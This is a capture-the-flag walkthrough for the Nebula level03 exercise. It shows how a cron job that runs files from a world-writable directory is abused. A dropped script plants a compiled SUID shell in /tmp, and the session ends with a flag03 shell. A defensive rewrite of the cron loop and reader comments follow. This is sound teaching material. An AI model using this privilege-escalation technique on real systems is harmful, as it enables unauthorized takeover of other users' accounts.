level03@nebula:~$ ls -l /home/flag03
total 8
drwxrwxrwx 2 flag03 flag03 4096 2012-08-08 00:21 writable.d
-rwxr-xr-x 1 flag03 flag03   98 2011-11-20 21:22 writable.sh

writable.d seems to be world-writable (everyone can write to it, just like /tmp).
writable.sh must be the script called by cron. Let's see what it does:
level03@nebula:~$ cat /home/flag03/writable.sh
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
Apparently writable.sh runs every file residing in writable.d (with bash -x, under a 5 second CPU time limit) and then deletes it. We can't do a lot ourselves within a 5 second time limit; what we want is a shell. So our strategy will be the following:

Make a script to be called by writable.sh (which is itself called by cron and executed as user flag03) that drops a SUID shell for us in /tmp. Then we'll be free to use the shell in /tmp whenever we need it, for as long as we want.
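The root cause here is that a cron job executes whatever lands in a directory anyone can write to. As an added example (not part of the original writeup, and not Nebula's own code), here is the writable.sh loop rewritten defensively: it refuses to run anything unless the directory and each file are owned by the expected uid and are not writable by group or others. The function names, the owner argument and the use of GNU stat -c (as on the Ubuntu-based Nebula VM) are this example's own assumptions.

```shell
#!/bin/sh
# Added example, not from the original writeup: a defensive rewrite of the
# writable.sh loop. Rather than executing whatever is dropped into the
# directory, it only runs files that pass an ownership and permission check.
# Function names and the uid argument are assumptions; stat -c is GNU coreutils.

# check_safe PATH UID
# Returns 0 when PATH is owned by numeric uid UID and has neither the group
# nor the other write bit set; otherwise reports why on stderr and returns 1.
check_safe() {
    path=$1
    want_uid=$2
    owner=$(stat -c '%u' "$path") || return 1
    perms=$(stat -c '%A' "$path") || return 1
    if [ "$owner" != "$want_uid" ]; then
        echo "refusing $path: owned by uid $owner, expected $want_uid" >&2
        return 1
    fi
    # in the symbolic mode string (e.g. drwxrwxrwx) column 6 is the group
    # write bit and column 9 the other write bit
    group_w=$(printf '%s' "$perms" | cut -c6)
    other_w=$(printf '%s' "$perms" | cut -c9)
    if [ "$group_w" = "w" ] || [ "$other_w" = "w" ]; then
        echo "refusing $path: writable by group or others ($perms)" >&2
        return 1
    fi
    return 0
}

# run_dropbox DIR UID
# Same shape as writable.sh: run each regular file in DIR under a 5 second
# CPU limit and delete it afterwards, but only for files that pass check_safe.
# Files that fail the check are reported and left in place, never executed.
# Returns 0 when everything was run, 1 if the directory or any file was refused.
run_dropbox() {
    dir=$1
    want_uid=$2
    refused=0
    check_safe "$dir" "$want_uid" || return 1
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        if check_safe "$f" "$want_uid"; then
            (ulimit -t 5; sh "$f")
            rm -f "$f"
        else
            refused=1
        fi
    done
    return "$refused"
}
```

Called from the cron job as `run_dropbox /home/flag03/writable.d "$(id -u flag03)"`, with writable.d itself changed to mode 755, the loop refuses the world-writable directory outright, and any refusal is printed to stderr, which cron mails to the job owner, so tampering attempts become visible instead of being silently executed and deleted.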
The shell
For the shell we'll just make a simple C program which calls setresuid and then executes bash:
level03@nebula:~$ cat > /tmp/level03_sh.c
#define _GNU_SOURCE      /* setresuid() is only declared by <unistd.h> with this */
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>

int main(void)
{
    /* the effective uid is flag03 once the binary is SUID flag03 */
    uid_t euid = geteuid();
    /* set real, effective and saved uid so the child shell keeps it */
    setresuid(euid, euid, euid);
    system("/bin/sh");
    return 0;
}
level03@nebula:~$ make /tmp/level03_sh
cc /tmp/level03_sh.c -o /tmp/level03_sh
The script
First we make the script which will drop our shell and put it in writable.d:
level03@nebula:~$ cat > /home/flag03/writable.d/execme
#!/bin/sh
cp /tmp/level03_sh /tmp/flag03_sh
chmod +s /tmp/flag03_sh
level03@nebula:~$ chmod +x /home/flag03/writable.d/execme

Then we wait for it to be called:

level03@nebula:~$ sleep 180; /tmp/flag03_sh
sh-4.2$ id
uid=996(flag03) gid=1004(level03) groups=996(flag03),1004(level03)

In no longer than 3 minutes we have a shell. Now get that flag :D

sh-4.2$ getflag
You have successfully executed getflag on a target account
~ Dmitry
dmitry: I can't get a shell the way described. For some reason the SUID binary obtained from cron gives whoami = level03, although it is -perm -4000 and +x.

Compared with the previous levels: there the SUID binary always had the group of the default user (level0x), but here the SUID binary turns out to be flag03:flag03. Maybe that's the problem?
Hm... I receive a permission denied trying to use make.